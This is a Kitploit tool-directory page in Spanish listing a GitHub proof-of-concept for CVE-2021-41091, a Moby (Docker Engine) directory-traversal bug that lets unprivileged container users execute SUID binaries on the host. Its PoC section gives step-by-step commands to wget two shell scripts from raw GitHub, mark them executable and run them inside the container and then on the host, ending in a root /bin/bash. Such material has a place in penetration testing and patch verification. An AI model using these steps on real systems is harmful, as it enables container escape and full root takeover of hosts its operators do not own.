Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-41091 — Exploit de prueba de concepto para CVE-2021-41091: Moby (Docker Engine) directory traversal que permite a usuarios no privilegiados ejecutar binarios SUID desde el contenedor en el host. Incluye scripts PoC para Ubuntu 20.04. | Kitploit
Herramientas/GitHubGitHub/jrbh4ck/cve-2021-41091
Escalada de PrivilegiosSeguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónEscape de Contenedores
GitHubjrbh4ck/cve-2021-41091

CVE-2021-41091

Exploit de prueba de concepto para CVE-2021-41091: Moby (Docker Engine) directory traversal que permite a usuarios no privilegiados ejecutar binarios SUID desde el contenedor en el host. Incluye scripts PoC para Ubuntu 20.04.

Ver Repositorio
hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-41091

Un bug en Moby (Docker Engine) permite a usuarios sin privilegios atravesar directorios y ejecutar programas directamente del docker en la maquina principal, si en el docker existe un progrma suid el usuario lo podra ejecutar como suid en la maquina principal

PoC

En la terminal del contenedor descargamos el archivo docker.sh, luego lo ejecutamos como usuario root:

root@kitploit:~
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/docker.sh
chmod +x docker.sh
./docker.sh

Ahora en la maquina principal descargamos el archivo principal.sh y lo ejecutamos:

root@kitploit:~
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/principal.sh
chmod +x principal.sh
./principal.sh

Ejecutamos el comando que nos dara el archivo y seremos capaces de ejecutar la /bin/bash como root

Notas

Estos scripts fueron probados en Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64) con la version de Moby 20.10.5+dfsg1

EL USO DE ESTE REPOSITORIO ES RESPONSABILIDAD DE QUIEN LO UTILICE Y NO DE EL AUTOR

Descargar herramienta